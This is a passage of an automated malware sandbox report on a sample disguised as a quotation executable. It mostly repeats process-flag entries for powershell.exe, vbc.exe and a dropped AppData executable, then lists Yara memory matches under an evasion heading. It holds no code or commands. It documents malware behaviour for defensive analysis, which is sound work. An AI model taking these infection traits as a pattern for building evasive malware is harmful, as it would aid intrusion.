                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IEGkgGtnYpDN.exe PID: 8112, type: MEMORYSTR
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: 94C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: A4C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
